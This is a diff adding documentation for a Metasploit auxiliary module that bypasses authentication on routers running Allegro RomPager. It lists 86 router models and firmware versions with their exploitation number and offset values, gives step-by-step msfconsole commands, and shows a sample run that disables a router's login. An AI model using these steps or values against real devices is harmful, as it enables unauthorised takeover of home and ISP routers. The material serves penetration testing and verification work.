|
| 1 | +## Vulnerable devices |
| 2 | + |
| 3 | +Following is list of devices and firmware versions with known values used for exploitation |
| 4 | +0. Azmoon AZ-D140W - 2.11.89.0(RE2.C29)3.11.11.52_PMOFF.1 |
| 5 | +1. Billion BiPAC 5102S - Av2.7.0.23 (UE0.B1C) |
| 6 | +2. Billion BiPAC 5102S - Bv2.7.0.23 (UE0.B1C) |
| 7 | +3. Billion BiPAC 5200 - 2.11.84.0(UE2.C2)3.11.11.6 |
| 8 | +4. Billion BiPAC 5200 - 2_11_62_2_ UE0.C2D_3_10_16_0 |
| 9 | +5. Billion BiPAC 5200A - 2_10_5 _0(RE0.C2)3_6_0_0 |
| 10 | +6. Billion BiPAC 5200A - 2_11_38_0 (RE0.C29)3_10_5_0 |
| 11 | +7. Billion BiPAC 5200GR4 - 2.11.91.0(RE2.C29)3.11.11.52 |
| 12 | +8. Billion BiPAC 5200SRD - 2.10.5.0 (UE0.C2C) 3.6.0.0 |
| 13 | +9. Billion BiPAC 5200SRD - 2.12.17.0_UE2.C3_3.12.17.0 |
| 14 | +10. Billion BiPAC 5200SRD - 2_11_62_2(UE0.C3D)3_11_11_22 |
| 15 | +11. D-Link DSL-2520U - Z1 1.08 DSL-2520U_RT63261_Middle_East_ADSL |
| 16 | +12. D-Link DSL-2600U - Z1_DSL-2600U |
| 17 | +13. D-Link DSL-2600U - Z2_V1.08_ras |
| 18 | +14. TP-Link TD-8616 - V2_080513 |
| 19 | +15. TP-Link TD-8816 - V4_100528_Russia |
| 20 | +16. TP-Link TD-8816 - V4_100524 |
| 21 | +17. TP-Link TD-8816 - V5_100528_Russia |
| 22 | +18. TP-Link TD-8816 - V5_100524 |
| 23 | +19. TP-Link TD-8816 - V5_100903 |
| 24 | +20. TP-Link TD-8816 - V6_100907 |
| 25 | +21. TP-Link TD-8816 - V7_111103 |
| 26 | +22. TP-Link TD-8816 - V7_130204 |
| 27 | +23. TP-Link TD-8817 - V5_100524 |
| 28 | +24. TP-Link TD-8817 - V5_100702_TR |
| 29 | +25. TP-Link TD-8817 - V5_100903 |
| 30 | +26. TP-Link TD-8817 - V6_100907 |
| 31 | +27. TP-Link TD-8817 - V6_101221 |
| 32 | +28. TP-Link TD-8817 - V7_110826 |
| 33 | +29. TP-Link TD-8817 - V7_130217 |
| 34 | +30. TP-Link TD-8817 - V7_120509 |
| 35 | +31. TP-Link TD-8817 - V8_140311 |
| 36 | +32. TP-Link TD-8820 - V3_091223 |
| 37 | +33. TP-Link TD-8840T - V1_080520 |
| 38 | +34. TP-Link TD-8840T - V2_100525 |
| 39 | +35. TP-Link TD-8840T - V2_100702_TR |
| 40 | +36. TP-Link TD-8840T - V2_090609 |
| 41 | +37. TP-Link TD-8840T - V3_101208 |
| 42 | +38. TP-Link TD-8840T - V3_110221 |
| 43 | +39. TP-Link TD-8840T - V3_120531 |
| 44 | +40. TP-Link TD-W8101G - V1_090107 |
| 45 | +41. TP-Link TD-W8101G - V1_090107 |
| 46 | +42. TP-Link TD-W8101G - V2_100819 |
| 47 | +43. TP-Link TD-W8101G - V2_101015_TR |
| 48 | +44. TP-Link TD-W8101G - V2_101101 |
| 49 | +45. TP-Link TD-W8101G - V3_110119 |
| 50 | +46. TP-Link TD-W8101G - V3_120213 |
| 51 | +47. TP-Link TD-W8101G - V3_120604 |
| 52 | +48. TP-Link TD-W8151N - V3_120530 |
| 53 | +49. TP-Link TD-W8901G - V1_080522 |
| 54 | +50. TP-Link TD-W8901G - V1,2_080522 |
| 55 | +51. TP-Link TD-W8901G - V2_090113_Turkish |
| 56 | +52. TP-Link TD-W8901G - V3_140512 |
| 57 | +53. TP-Link TD-W8901G - V3_100603 |
| 58 | +54. TP-Link TD-W8901G - V3_100702_TR |
| 59 | +55. TP-Link TD-W8901G - V3_100901 |
| 60 | +56. TP-Link TD-W8901G - V6_110119 |
| 61 | +57. TP-Link TD-W8901G - V6_110915 |
| 62 | +58. TP-Link TD-W8901G - V6_120418 |
| 63 | +59. TP-Link TD-W8901G - V6_120213 |
| 64 | +60. TP-Link TD-W8901GB - V3_100727 |
| 65 | +61. TP-Link TD-W8901GB - V3_100820 |
| 66 | +62. TP-Link TD-W8901N - V1_111211 |
| 67 | +63. TP-Link TD-W8951ND - V1_101124,100723,100728 |
| 68 | +64. TP-Link TD-W8951ND - V1_110907 |
| 69 | +65. TP-Link TD-W8951ND - V1_111125 |
| 70 | +66. TP-Link TD-W8951ND - V3.0_110729_FI |
| 71 | +67. TP-Link TD-W8951ND - V3_110721 |
| 72 | +68. TP-Link TD-W8951ND - V3_20110729_FI |
| 73 | +69. TP-Link TD-W8951ND - V4_120511 |
| 74 | +70. TP-Link TD-W8951ND - V4_120607 |
| 75 | +71. TP-Link TD-W8951ND - V4_120912_FL |
| 76 | +72. TP-Link TD-W8961NB - V1_110107 |
| 77 | +73. TP-Link TD-W8961NB - V1_110519 |
| 78 | +74. TP-Link TD-W8961NB - V2_120319 |
| 79 | +75. TP-Link TD-W8961NB - V2_120823 |
| 80 | +76. TP-Link TD-W8961ND - V1_100722,101122 |
| 81 | +77. TP-Link TD-W8961ND - V1_101022_TR |
| 82 | +78. TP-Link TD-W8961ND - V1_111125 |
| 83 | +79. TP-Link TD-W8961ND - V2_120427 |
| 84 | +80. TP-Link TD-W8961ND - V2_120710_UK |
| 85 | +81. TP-Link TD-W8961ND - V2_120723_FI |
| 86 | +82. TP-Link TD-W8961ND - V3_120524,120808 |
| 87 | +83. TP-Link TD-W8961ND - V3_120830 |
| 88 | +84. ZyXEL P-660R-T3 - 3.40(BOQ.0)C0 |
| 89 | +85. ZyXEL P-660RU-T3 - 3.40(BJR.0)C0 |
| 90 | + |
| 91 | +## Verification Steps |
| 92 | + |
| 93 | + 1. Start msfconsole |
| 94 | + 2. Do: ```use auxiliary/admin/http/allegro_rompager_auth_bypass``` |
| 95 | + 3. Do: ```set rhost <ip>``` |
| 96 | + 4. Do: ```set rport <port>``` |
| 97 | + 5. Do: ```set device <device-id>``` |
| 98 | + 6. Do: ```run``` |
| 99 | + 7. You should be able to login into the device without authentication |
| 100 | + |
| 101 | +## Scenarios |
| 102 | + |
| 103 | + Example run against TP-Link TD-8840T with firmware V2_100525: |
| 104 | +``` |
| 105 | +msf > use auxiliary/admin/http/allegro_rompager_auth_bypass |
| 106 | +msf auxiliary(allegro_rompager_auth_bypass) > devices |
| 107 | +
|
| 108 | +List of vulnerable devices |
| 109 | +========================== |
| 110 | +
|
| 111 | + ID Name Model Firmware Number Offset |
| 112 | + -- ---- ----- -------- ------ ------ |
| 113 | + 0 Azmoon AZ-D140W 2.11.89.0(RE2.C29)3.11.11.52_PMOFF.1 107367693 13 |
| 114 | + 1 Billion BiPAC 5102S Av2.7.0.23 (UE0.B1C) 107369694 13 |
| 115 | + 2 Billion BiPAC 5102S Bv2.7.0.23 (UE0.B1C) 107369694 13 |
| 116 | + 3 Billion BiPAC 5200 2.11.84.0(UE2.C2)3.11.11.6 107369545 9 |
| 117 | + 4 Billion BiPAC 5200 2_11_62_2_ UE0.C2D_3_10_16_0 107371218 21 |
| 118 | + 5 Billion BiPAC 5200A 2_10_5 _0(RE0.C2)3_6_0_0 107366366 25 |
| 119 | + 6 Billion BiPAC 5200A 2_11_38_0 (RE0.C29)3_10_5_0 107371453 9 |
| 120 | + 7 Billion BiPAC 5200GR4 2.11.91.0(RE2.C29)3.11.11.52 107367690 21 |
| 121 | + 8 Billion BiPAC 5200SRD 2.10.5.0 (UE0.C2C) 3.6.0.0 107368270 1 |
| 122 | + 9 Billion BiPAC 5200SRD 2.12.17.0_UE2.C3_3.12.17.0 107371378 37 |
| 123 | + 10 Billion BiPAC 5200SRD 2_11_62_2(UE0.C3D)3_11_11_22 107371218 13 |
| 124 | + 11 D-Link DSL-2520U Z1 1.08 DSL-2520U_RT63261_Middle_East_ADSL 107368902 25 |
| 125 | + 12 D-Link DSL-2600U Z1_DSL-2600U 107366496 13 |
| 126 | + 13 D-Link DSL-2600U Z2_V1.08_ras 107360133 20 |
| 127 | + 14 TP-Link TD-8616 V2_080513 107371483 21 |
| 128 | + 15 TP-Link TD-8816 V4_100528_Russia 107369790 17 |
| 129 | + 16 TP-Link TD-8816 V4_100524 107369790 17 |
| 130 | + 17 TP-Link TD-8816 V5_100528_Russia 107369790 17 |
| 131 | + 18 TP-Link TD-8816 V5_100524 107369790 17 |
| 132 | + 19 TP-Link TD-8816 V5_100903 107369790 17 |
| 133 | + 20 TP-Link TD-8816 V6_100907 107371426 17 |
| 134 | + 21 TP-Link TD-8816 V7_111103 107371161 1 |
| 135 | + 22 TP-Link TD-8816 V7_130204 107370211 5 |
| 136 | + 23 TP-Link TD-8817 V5_100524 107369790 17 |
| 137 | + 24 TP-Link TD-8817 V5_100702_TR 107369790 17 |
| 138 | + 25 TP-Link TD-8817 V5_100903 107369790 17 |
| 139 | + 26 TP-Link TD-8817 V6_100907 107369788 1 |
| 140 | + 27 TP-Link TD-8817 V6_101221 107369788 1 |
| 141 | + 28 TP-Link TD-8817 V7_110826 107369522 25 |
| 142 | + 29 TP-Link TD-8817 V7_130217 107369316 21 |
| 143 | + 30 TP-Link TD-8817 V7_120509 107369321 9 |
| 144 | + 31 TP-Link TD-8817 V8_140311 107351277 20 |
| 145 | + 32 TP-Link TD-8820 V3_091223 107369768 17 |
| 146 | + 33 TP-Link TD-8840T V1_080520 107369845 5 |
| 147 | + 34 TP-Link TD-8840T V2_100525 107369790 17 |
| 148 | + 35 TP-Link TD-8840T V2_100702_TR 107369790 17 |
| 149 | + 36 TP-Link TD-8840T V2_090609 107369570 1 |
| 150 | + 37 TP-Link TD-8840T V3_101208 107369766 17 |
| 151 | + 38 TP-Link TD-8840T V3_110221 107369764 5 |
| 152 | + 39 TP-Link TD-8840T V3_120531 107369688 17 |
| 153 | + 40 TP-Link TD-W8101G V1_090107 107367772 37 |
| 154 | + 41 TP-Link TD-W8101G V1_090107 107367808 21 |
| 155 | + 42 TP-Link TD-W8101G V2_100819 107367751 21 |
| 156 | + 43 TP-Link TD-W8101G V2_101015_TR 107367749 13 |
| 157 | + 44 TP-Link TD-W8101G V2_101101 107367749 13 |
| 158 | + 45 TP-Link TD-W8101G V3_110119 107367765 25 |
| 159 | + 46 TP-Link TD-W8101G V3_120213 107367052 25 |
| 160 | + 47 TP-Link TD-W8101G V3_120604 107365835 1 |
| 161 | + 48 TP-Link TD-W8151N V3_120530 107353867 24 |
| 162 | + 49 TP-Link TD-W8901G V1_080522 107367787 21 |
| 163 | + 50 TP-Link TD-W8901G V1,2_080522 107368013 5 |
| 164 | + 51 TP-Link TD-W8901G V2_090113_Turkish 107368013 5 |
| 165 | + 52 TP-Link TD-W8901G V3_140512 107367854 9 |
| 166 | + 53 TP-Link TD-W8901G V3_100603 107367751 21 |
| 167 | + 54 TP-Link TD-W8901G V3_100702_TR 107367751 21 |
| 168 | + 55 TP-Link TD-W8901G V3_100901 107367749 13 |
| 169 | + 56 TP-Link TD-W8901G V6_110119 107367765 25 |
| 170 | + 57 TP-Link TD-W8901G V6_110915 107367682 21 |
| 171 | + 58 TP-Link TD-W8901G V6_120418 107365835 1 |
| 172 | + 59 TP-Link TD-W8901G V6_120213 107367052 25 |
| 173 | + 60 TP-Link TD-W8901GB V3_100727 107367756 13 |
| 174 | + 61 TP-Link TD-W8901GB V3_100820 107369393 21 |
| 175 | + 62 TP-Link TD-W8901N V1_111211 107353880 0 |
| 176 | + 63 TP-Link TD-W8951ND V1_101124,100723,100728 107369839 25 |
| 177 | + 64 TP-Link TD-W8951ND V1_110907 107369876 13 |
| 178 | + 65 TP-Link TD-W8951ND V1_111125 107369876 13 |
| 179 | + 66 TP-Link TD-W8951ND V3.0_110729_FI 107366743 21 |
| 180 | + 67 TP-Link TD-W8951ND V3_110721 107366743 21 |
| 181 | + 68 TP-Link TD-W8951ND V3_20110729_FI 107366743 21 |
| 182 | + 69 TP-Link TD-W8951ND V4_120511 107364759 25 |
| 183 | + 70 TP-Link TD-W8951ND V4_120607 107364759 13 |
| 184 | + 71 TP-Link TD-W8951ND V4_120912_FL 107364760 21 |
| 185 | + 72 TP-Link TD-W8961NB V1_110107 107369844 17 |
| 186 | + 73 TP-Link TD-W8961NB V1_110519 107369844 17 |
| 187 | + 74 TP-Link TD-W8961NB V2_120319 107367629 21 |
| 188 | + 75 TP-Link TD-W8961NB V2_120823 107366421 13 |
| 189 | + 76 TP-Link TD-W8961ND V1_100722,101122 107369839 25 |
| 190 | + 77 TP-Link TD-W8961ND V1_101022_TR 107369839 25 |
| 191 | + 78 TP-Link TD-W8961ND V1_111125 107369876 13 |
| 192 | + 79 TP-Link TD-W8961ND V2_120427 107364732 25 |
| 193 | + 80 TP-Link TD-W8961ND V2_120710_UK 107364771 37 |
| 194 | + 81 TP-Link TD-W8961ND V2_120723_FI 107364762 29 |
| 195 | + 82 TP-Link TD-W8961ND V3_120524,120808 107353880 0 |
| 196 | + 83 TP-Link TD-W8961ND V3_120830 107353414 36 |
| 197 | + 84 ZyXEL P-660R-T3 3.40(BOQ.0)C0 107369567 21 |
| 198 | + 85 ZyXEL P-660RU-T3 3.40(BJR.0)C0 107369567 21 |
| 199 | +
|
| 200 | +msf auxiliary(allegro_rompager_auth_bypass) > show options |
| 201 | +
|
| 202 | +Module options (auxiliary/admin/http/allegro_rompager_auth_bypass): |
| 203 | +
|
| 204 | + Name Current Setting Required Description |
| 205 | + ---- --------------- -------- ----------- |
| 206 | + Proxies no A proxy chain of format type:host:port[,type:host:port][...] |
| 207 | + RHOST yes The target address |
| 208 | + RPORT 80 yes The target port |
| 209 | + SSL false no Negotiate SSL/TLS for outgoing connections |
| 210 | + TARGETURI / yes URI to test |
| 211 | + VHOST no HTTP server virtual host |
| 212 | + device yes ID of device from list of vulnerable devices |
| 213 | +
|
| 214 | +msf auxiliary(allegro_rompager_auth_bypass) > set rhost 192.168.1.1 |
| 215 | +rhost => 192.168.1.1 |
| 216 | +msf auxiliary(allegro_rompager_auth_bypass) > set device 33 |
| 217 | +device => 33 |
| 218 | +msf auxiliary(allegro_rompager_auth_bypass) > run |
| 219 | +
|
| 220 | +[*] Device name: TP-Link |
| 221 | +[*] Device model: TD-8840T |
| 222 | +[*] Device firmware: V1_080520 |
| 223 | +[-] Exploit failed |
| 224 | +[*] Auxiliary module execution completed |
| 225 | +msf auxiliary(allegro_rompager_auth_bypass) > set device 34 |
| 226 | +device => 34 |
| 227 | +msf auxiliary(allegro_rompager_auth_bypass) > run |
| 228 | +
|
| 229 | +[*] Device name: TP-Link |
| 230 | +[*] Device model: TD-8840T |
| 231 | +[*] Device firmware: V2_100525 |
| 232 | +[+] Exploit sent, please check host, authentication should be disabled |
| 233 | +[*] Auxiliary module execution completed |
| 234 | +``` |
0 commit comments